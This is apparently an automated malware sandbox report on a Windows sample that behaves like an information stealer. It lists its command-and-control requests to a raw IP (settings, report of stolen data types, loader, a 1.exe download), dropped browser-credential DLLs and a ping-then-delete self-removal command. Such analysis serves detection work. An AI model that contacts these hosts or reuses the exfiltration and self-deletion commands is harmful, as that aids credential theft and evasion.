Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | Oct. 19, 2021, 9:42 a.m. | Oct. 19, 2021, 9:53 a.m. |
Suricata Alerts
Suricata TLS
No Suricata TLS
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome |
section | .vmp0 |
section | .vmp1 |
suspicious_features | Connection to IP address | suspicious_request | GET http://128.199.63.64/deepanal/system/assets/bundle.bin | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://128.199.63.64/deepanal/gate.php?type=settings | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://128.199.63.64/deepanal/gate.php?type=ip | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://128.199.63.64/deepanal/gate.php?type=report&tag=traffic3&uid=39B06D4D868D1303186797&passwords=0&cookies=0&autofill=0&cc=0&wallets=0&steam=0&battlenet=0&telegram=1&discord=0&jabber=0&vpn=0&ftp=1 | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://128.199.63.64/deepanal/gate.php?type=loader&tag=traffic3 | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://128.199.63.64/hoetnaca/exps/1.exe |
request | GET http://128.199.63.64/deepanal/system/assets/bundle.bin |
request | GET http://128.199.63.64/deepanal/gate.php?type=settings |
request | GET http://128.199.63.64/deepanal/gate.php?type=ip |
request | GET http://128.199.63.64/deepanal/gate.php?type=report&tag=traffic3&uid=39B06D4D868D1303186797&passwords=0&cookies=0&autofill=0&cc=0&wallets=0&steam=0&battlenet=0&telegram=1&discord=0&jabber=0&vpn=0&ftp=1 |
request | GET http://128.199.63.64/deepanal/gate.php?type=loader&tag=traffic3 |
request | GET http://128.199.63.64/hoetnaca/exps/1.exe |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State |
file | C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-private-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\freebl3.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-heap-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-time-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\softokn3.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-core-file-l2-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-stdio-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-process-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-conio-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-math-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-locale-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-core-localization-l1-2-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-convert-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\sqlite3.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\mozglue.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-runtime-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\twain_32.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-string-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-environment-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-utility-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\1.exe |
file | C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-core-timezone-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-multibyte-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-filesystem-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-core-synch-l1-2-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\vcruntime140.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\nss3.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\msvcp140.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-core-processthreads-l1-1-1.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\zip.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-core-file-l1-2-0.dll |
cmdline | cmd.exe /c chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\test22\AppData\Local\Temp\cock.mp4" |
cmdline | "C:\Windows\System32\cmd.exe" /c chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\test22\AppData\Local\Temp\cock.mp4" |
file | C:\Users\test22\AppData\Local\Temp\1.exe |
file | C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-conio-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\freebl3.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-core-timezone-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-core-processthreads-l1-1-1.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-private-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-time-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\twain_32.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\softokn3.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\nss3.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-runtime-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-stdio-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-math-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\cock.mp4 |
file | C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-heap-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\1.exe |
file | C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-utility-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-process-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-convert-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-environment-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\sqlite3.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-filesystem-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-string-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-core-localization-l1-2-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\zip.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-locale-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\mozglue.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-multibyte-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\msvcp140.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-core-file-l2-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\vcruntime140.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-core-file-l1-2-0.dll |
file | C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-core-synch-l1-2-0.dll |